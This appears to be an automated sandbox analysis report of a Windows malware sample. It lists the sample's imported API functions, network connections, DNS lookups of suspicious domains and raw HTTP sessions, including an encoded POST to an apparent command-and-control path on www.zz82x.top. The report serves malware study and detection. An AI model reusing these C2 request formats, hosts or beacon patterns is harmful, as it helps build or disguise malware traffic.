USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 18:22:12.744544983 CET | 49709 | 80 | 192.168.2.8 | 3.33.130.190
Dec 5, 2024 18:22:12.864360094 CET | 80 | 49709 | 3.33.130.190 | 192.168.2.8
Dec 5, 2024 18:22:12.864444971 CET | 49709 | 80 | 192.168.2.8 | 3.33.130.190
Dec 5, 2024 18:22:12.873578072 CET | 49709 | 80 | 192.168.2.8 | 3.33.130.190
Dec 5, 2024 18:22:12.993447065 CET | 80 | 49709 | 3.33.130.190 | 192.168.2.8
Dec 5, 2024 18:22:13.962656975 CET | 80 | 49709 | 3.33.130.190 | 192.168.2.8
Dec 5, 2024 18:22:13.963264942 CET | 80 | 49709 | 3.33.130.190 | 192.168.2.8
Dec 5, 2024 18:22:13.963447094 CET | 49709 | 80 | 192.168.2.8 | 3.33.130.190
Dec 5, 2024 18:22:13.966891050 CET | 49709 | 80 | 192.168.2.8 | 3.33.130.190
Dec 5, 2024 18:22:14.087563992 CET | 80 | 49709 | 3.33.130.190 | 192.168.2.8
Dec 5, 2024 18:22:37.943238020 CET | 49743 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:38.065814972 CET | 80 | 49743 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:38.065906048 CET | 49743 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:38.078440905 CET | 49743 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:38.198843002 CET | 80 | 49743 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:39.586735010 CET | 49743 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:39.636781931 CET | 80 | 49743 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:39.636842966 CET | 49743 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:39.636914968 CET | 80 | 49743 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:39.636965036 CET | 49743 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:39.707138062 CET | 80 | 49743 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:39.707197905 CET | 49743 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:40.605120897 CET | 49749 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:40.727535009 CET | 80 | 49749 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:40.727700949 CET | 49749 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:40.738253117 CET | 49749 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:40.857970953 CET | 80 | 49749 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:42.242875099 CET | 49749 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:42.366065025 CET | 80 | 49749 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:42.366142035 CET | 49749 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:43.261409998 CET | 49755 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:43.381355047 CET | 80 | 49755 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:43.381453037 CET | 49755 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:43.392133951 CET | 49755 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:43.511833906 CET | 80 | 49755 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:43.511924982 CET | 80 | 49755 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:44.898994923 CET | 49755 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:44.920101881 CET | 80 | 49755 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:44.920233965 CET | 49755 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:45.037763119 CET | 80 | 49755 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:45.037908077 CET | 49755 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:45.918663025 CET | 49764 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:46.038434982 CET | 80 | 49764 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:46.038525105 CET | 49764 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:46.046241045 CET | 49764 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:46.166115046 CET | 80 | 49764 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:47.592560053 CET | 80 | 49764 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:47.592606068 CET | 80 | 49764 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:47.592794895 CET | 49764 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:47.595541000 CET | 49764 | 80 | 192.168.2.8 | 38.47.232.196
Dec 5, 2024 18:22:47.715307951 CET | 80 | 49764 | 38.47.232.196 | 192.168.2.8
Dec 5, 2024 18:22:53.129635096 CET | 49782 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:53.249465942 CET | 80 | 49782 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:53.249624968 CET | 49782 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:53.261367083 CET | 49782 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:53.381774902 CET | 80 | 49782 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:54.540719032 CET | 80 | 49782 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:54.540790081 CET | 80 | 49782 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:54.540847063 CET | 49782 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:54.773952961 CET | 49782 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:55.792968988 CET | 49788 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:55.914436102 CET | 80 | 49788 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:55.914556980 CET | 49788 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:55.925795078 CET | 49788 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:56.052500010 CET | 80 | 49788 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:57.208271027 CET | 80 | 49788 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:57.209103107 CET | 80 | 49788 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:57.209162951 CET | 49788 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:57.431601048 CET | 49788 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:58.459650040 CET | 49794 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:58.579472065 CET | 80 | 49794 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:58.579679012 CET | 49794 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:58.593518972 CET | 49794 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:22:58.717166901 CET | 80 | 49794 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:58.717233896 CET | 80 | 49794 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:59.976537943 CET | 80 | 49794 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:59.976583004 CET | 80 | 49794 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:22:59.976771116 CET | 49794 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:23:00.102082014 CET | 49794 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:23:01.192743063 CET | 49803 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:23:01.312685966 CET | 80 | 49803 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:23:01.313591957 CET | 49803 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:23:01.386142969 CET | 49803 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:23:01.506004095 CET | 80 | 49803 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:23:02.597970963 CET | 80 | 49803 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:23:02.598225117 CET | 80 | 49803 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:23:02.598393917 CET | 49803 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:23:02.598866940 CET | 80 | 49803 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:23:02.598952055 CET | 49803 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:23:02.601430893 CET | 49803 | 80 | 192.168.2.8 | 217.160.0.207
Dec 5, 2024 18:23:02.721354961 CET | 80 | 49803 | 217.160.0.207 | 192.168.2.8
Dec 5, 2024 18:23:08.496809006 CET | 49821 | 80 | 192.168.2.8 | 54.67.87.110
Dec 5, 2024 18:23:08.617969990 CET | 80 | 49821 | 54.67.87.110 | 192.168.2.8
Dec 5, 2024 18:23:08.618253946 CET | 49821 | 80 | 192.168.2.8 | 54.67.87.110
Dec 5, 2024 18:23:08.634721994 CET | 49821 | 80 | 192.168.2.8 | 54.67.87.110
Dec 5, 2024 18:23:08.754565954 CET | 80 | 49821 | 54.67.87.110 | 192.168.2.8
Dec 5, 2024 18:23:09.855412006 CET | 80 | 49821 | 54.67.87.110 | 192.168.2.8
Dec 5, 2024 18:23:09.855600119 CET | 80 | 49821 | 54.67.87.110 | 192.168.2.8
Dec 5, 2024 18:23:09.855680943 CET | 49821 | 80 | 192.168.2.8 | 54.67.87.110
Dec 5, 2024 18:23:10.149017096 CET | 49821 | 80 | 192.168.2.8 | 54.67.87.110
Dec 5, 2024 18:23:11.173520088 CET | 49827 | 80 | 192.168.2.8 | 54.67.87.110
Dec 5, 2024 18:23:11.293329954 CET | 80 | 49827 | 54.67.87.110 | 192.168.2.8
Dec 5, 2024 18:23:11.293642998 CET | 49827 | 80 | 192.168.2.8 | 54.67.87.110
Dec 5, 2024 18:23:11.304506063 CET | 49827 | 80 | 192.168.2.8 | 54.67.87.110
Dec 5, 2024 18:23:11.428427935 CET | 80 | 49827 | 54.67.87.110 | 192.168.2.8
Dec 5, 2024 18:23:12.522968054 CET | 80 | 49827 | 54.67.87.110 | 192.168.2.8
Dec 5, 2024 18:23:12.523040056 CET | 80 | 49827 | 54.67.87.110 | 192.168.2.8
Dec 5, 2024 18:23:12.523653984 CET | 49827 | 80 | 192.168.2.8 | 54.67.87.110
Dec 5, 2024 18:23:12.821546078 CET | 49827 | 80 | 192.168.2.8 | 54.67.87.110
Dec 5, 2024 18:23:13.840888023 CET | 49833 | 80 | 192.168.2.8 | 54.67.87.110
Dec 5, 2024 18:23:13.966423988 CET | 80 | 49833 | 54.67.87.110 | 192.168.2.8
Dec 5, 2024 18:23:13.966511011 CET | 49833 | 80 | 192.168.2.8 | 54.67.87.110
                                          Dec 5, 2024 18:23:13.980938911 CET4983380192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:14.104768038 CET804983354.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:14.109380960 CET804983354.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:15.254499912 CET804983354.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:15.254581928 CET804983354.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:15.254776955 CET4983380192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:16.305237055 CET4983380192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:17.325550079 CET4984280192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:17.445327997 CET804984254.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:17.445638895 CET4984280192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:17.453905106 CET4984280192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:17.573842049 CET804984254.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:18.683528900 CET804984254.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:18.683613062 CET804984254.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:18.683712006 CET4984280192.168.2.854.67.87.110
                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Dec 5, 2024 18:22:12.287625074 CET | 55586 | 53 | 192.168.2.8 | 1.1.1.1
                                           Dec 5, 2024 18:22:12.737404108 CET | 53 | 55586 | 1.1.1.1 | 192.168.2.8
                                           Dec 5, 2024 18:22:29.078017950 CET | 57540 | 53 | 192.168.2.8 | 1.1.1.1
                                           Dec 5, 2024 18:22:29.299346924 CET | 53 | 57540 | 1.1.1.1 | 192.168.2.8
                                           Dec 5, 2024 18:22:37.418112040 CET | 63603 | 53 | 192.168.2.8 | 1.1.1.1
                                           Dec 5, 2024 18:22:37.940063000 CET | 53 | 63603 | 1.1.1.1 | 192.168.2.8
                                           Dec 5, 2024 18:22:52.605504990 CET | 56840 | 53 | 192.168.2.8 | 1.1.1.1
                                           Dec 5, 2024 18:22:53.127178907 CET | 53 | 56840 | 1.1.1.1 | 192.168.2.8
                                           Dec 5, 2024 18:23:07.606266022 CET | 62632 | 53 | 192.168.2.8 | 1.1.1.1
                                           Dec 5, 2024 18:23:08.494102001 CET | 53 | 62632 | 1.1.1.1 | 192.168.2.8
                                           Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                           Dec 5, 2024 18:22:12.287625074 CET | 192.168.2.8 | 1.1.1.1 | 0xedc8 | Standard query (0) | www.healthyloveforall.net | A (IP address) | IN (0x0001) | false
                                           Dec 5, 2024 18:22:29.078017950 CET | 192.168.2.8 | 1.1.1.1 | 0xf458 | Standard query (0) | www.bonusgame2024.online | A (IP address) | IN (0x0001) | false
                                           Dec 5, 2024 18:22:37.418112040 CET | 192.168.2.8 | 1.1.1.1 | 0xa55f | Standard query (0) | www.zz82x.top | A (IP address) | IN (0x0001) | false
                                           Dec 5, 2024 18:22:52.605504990 CET | 192.168.2.8 | 1.1.1.1 | 0x8e8 | Standard query (0) | www.ophthalmo.cloud | A (IP address) | IN (0x0001) | false
                                           Dec 5, 2024 18:23:07.606266022 CET | 192.168.2.8 | 1.1.1.1 | 0x2faf | Standard query (0) | www.ngmr.xyz | A (IP address) | IN (0x0001) | false
                                           Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                           Dec 5, 2024 18:22:12.737404108 CET | 1.1.1.1 | 192.168.2.8 | 0xedc8 | No error (0) | www.healthyloveforall.net | healthyloveforall.net | | CNAME (Canonical name) | IN (0x0001) | false
                                           Dec 5, 2024 18:22:12.737404108 CET | 1.1.1.1 | 192.168.2.8 | 0xedc8 | No error (0) | healthyloveforall.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                           Dec 5, 2024 18:22:12.737404108 CET | 1.1.1.1 | 192.168.2.8 | 0xedc8 | No error (0) | healthyloveforall.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                           Dec 5, 2024 18:22:29.299346924 CET | 1.1.1.1 | 192.168.2.8 | 0xf458 | Name error (3) | www.bonusgame2024.online | none | none | A (IP address) | IN (0x0001) | false
                                           Dec 5, 2024 18:22:37.940063000 CET | 1.1.1.1 | 192.168.2.8 | 0xa55f | No error (0) | www.zz82x.top | zz82x.top | | CNAME (Canonical name) | IN (0x0001) | false
                                           Dec 5, 2024 18:22:37.940063000 CET | 1.1.1.1 | 192.168.2.8 | 0xa55f | No error (0) | zz82x.top | | 38.47.232.196 | A (IP address) | IN (0x0001) | false
                                           Dec 5, 2024 18:22:53.127178907 CET | 1.1.1.1 | 192.168.2.8 | 0x8e8 | No error (0) | www.ophthalmo.cloud | | 217.160.0.207 | A (IP address) | IN (0x0001) | false
                                           Dec 5, 2024 18:23:08.494102001 CET | 1.1.1.1 | 192.168.2.8 | 0x2faf | No error (0) | www.ngmr.xyz | | 54.67.87.110 | A (IP address) | IN (0x0001) | false
                                          • www.healthyloveforall.net
                                          • www.zz82x.top
                                          • www.ophthalmo.cloud
                                          • www.ngmr.xyz
                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           0 | 192.168.2.8 | 49709 | 3.33.130.190 | 80 | 3164 | C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Dec 5, 2024 18:22:12.873578072 CET | 522 | OUT | GET /r22w/?v4=NRh8&DTs4CD4=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q== HTTP/1.1
                                          Host: www.healthyloveforall.net
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                           Dec 5, 2024 18:22:13.962656975 CET | 403 | IN | HTTP/1.1 200 OK
                                          Server: openresty
                                          Date: Thu, 05 Dec 2024 17:22:13 GMT
                                          Content-Type: text/html
                                          Content-Length: 263
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 34 3d 4e 52 68 38 26 44 54 73 34 43 44 34 3d 45 73 52 58 58 37 76 45 6e 55 4a 41 50 34 35 39 6f 39 45 50 47 68 47 2f 5a 61 31 54 44 71 4b 6f 39 2f 6e 53 59 37 4c 5a 4f 36 6b 79 39 76 6f 2f 35 7a 75 78 37 37 5a 61 6f 71 4a 64 77 35 37 4e 68 72 69 73 66 35 65 31 43 33 54 51 46 4c 4e 4c 69 4e 63 71 49 48 4a 77 68 53 79 73 73 67 32 77 62 74 62 36 6a 31 41 4d 4d 63 76 65 32 50 65 54 7a 79 71 33 64 67 35 39 36 38 59 65 33 41 33 52 37 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?v4=NRh8&DTs4CD4=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q=="}</script></head></html>


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           1 | 192.168.2.8 | 49743 | 38.47.232.196 | 80 | 3164 | C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Dec 5, 2024 18:22:38.078440905 CET | 769 | OUT | POST /fk06/ HTTP/1.1
                                          Host: www.zz82x.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.zz82x.top
                                          Connection: close
                                          Content-Length: 208
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.zz82x.top/fk06/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 62 56 69 6d 6e 38 68 42 6a 73 55 55 78 35 4c 44 4a 43 4c 6c 52 6f 38 43 67 42 69 56 79 75 34 51 56 75 63 66 51 74 73 58 7a 62 43 6a 6a 45 33 63 4d 69 78 4a 32 2b 65 38 6f 2b 4e 42 51 30 77 79 52 4a 70 74 33 61 38 73 74 6a 76 4c 69 4b 50 2b 5a 4b 39 62 70 34 6f 38 6b 4e 36 46 4d 6c 78 55 52 2b 42 6d 6f 73 52 50 51 57 58 35 52 73 75 6b 41 73 45 56 70 2f 5a 74 74 31 78 2f 41 48 5a 6d 71 72 69 49 48 51 43 63 65 6a 38 57 5a 4b 68 4f 66 79 59 31 4a 67 39 36 51 54 4f 56 61 62 7a 49 70 69 4f 4f 6b 38 54 46 4b 6b 78 50 59 6c 68 48 36 4c 36 6d 6b 57 6d 65 7a 4d 3d
                                          Data Ascii: DTs4CD4=3wyGWJa50eJ6lbVimn8hBjsUUx5LDJCLlRo8CgBiVyu4QVucfQtsXzbCjjE3cMixJ2+e8o+NBQ0wyRJpt3a8stjvLiKP+ZK9bp4o8kN6FMlxUR+BmosRPQWX5RsukAsEVp/Ztt1x/AHZmqriIHQCcej8WZKhOfyY1Jg96QTOVabzIpiOOk8TFKkxPYlhH6L6mkWmezM=
                                           Dec 5, 2024 18:22:39.636781931 CET | 691 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 05 Dec 2024 17:22:39 GMT
                                          Content-Type: text/html
                                          Content-Length: 548
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
